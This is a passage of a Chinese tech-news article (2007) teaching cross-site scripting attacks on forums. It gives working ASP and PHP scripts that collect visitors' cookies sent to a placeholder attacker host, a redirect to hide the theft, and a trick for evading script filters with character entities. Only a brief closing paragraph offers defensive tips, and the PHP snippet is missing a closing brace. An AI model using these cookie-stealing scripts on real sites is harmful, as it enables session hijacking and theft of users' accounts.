科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道Script脚本跨站攻击漏洞技术分析(下)

Script脚本跨站攻击漏洞技术分析(下)

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

所谓跨站漏洞呢?其实这和现在比较热门的SQL注入的原理有异曲同工之处,都是由于程序员在写程序的时候对一些变量没有做充分的过滤,或者没做任何的过滤就直接把用户提交的数据送到SQL语句里执行

作者:论坛整理 来源:zdnet网络安全 2007年12月14日

关键字: 攻击 木马 漏洞

  • 评论
  • 分享微博
  • 分享邮件
 其中http://xxx.xxx.xxx/是大家自己网站空间,cookies.asp是一个asp脚本用于收集

  msg后边跟的参数,而参数我们指定的是document.cookie,也就是访问此贴用户的cookie。

  cookies.asp的代码是:
<%

  testfile=Server.MapPath("hun.txt")

  msg=Request("msg")

  set fs=server.CreateObject("scripting.filesystemobject")

  set thisfile=fs.OpenTextFile(testfile,8,True,0)

  thisfile.WriteLine(""&msg& "")

  thisfile.close

  set fs = nothing

  %> 

  这样所有访问者的cookie都会收集在hun.txt这个文件里

  但是访问者访问我们的帖子,同样会访问到我们的网站的,这样不是露馅了吗?呵呵,但只要我们稍做处理

  就可以做的相对真实,比如我们加上下面的代码

  <script language=vbscript> 
window.location.href="http://xxx.xxx.xxx" 
</script>

  这个xxx.xxx.xxx最好换成你攻击的网站的域名,这样做的目的是在他访问我们精心构造的网站同时开打他

  自己的网站,呵呵,这样是不是会更隐蔽一点呢?

  这个cookies.asp和有一个同样作用的cookies.php一样,附代码如下:
<?php 
$info = getenv("QUERY_STRING"); 
if ($info) { 
$fp = fopen("cookies.txt","a"); 
fwrite($fp,$info."\n"); 
fclose($fp); 

?>  

  但是大部份做的不错的论坛,都过滤了javascript这些字符。不过还是有方法可以利用的,

  可以在论坛发的贴里将javascript写成ascii码。像j可以写成”&#x6a;” 
    
  防范的方法,就是过滤字符像javascript/<script>/’/;/&/#了等等,

  当然前提是你的网页还要正常显示。建议大家不要轻易打开一些不明url,要将自己的信箱、论坛、QQ等资料的密码设的都不一样,

  如果一旦资料或密码被盗,避免引连锁反应,所有资料和密码都被别人获得。这就要用到博大精深是社会工程学了。

    总结一下吧。跨站的技巧性很强,呵呵大家多积累经验用起来会达到事半功倍的效果。

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章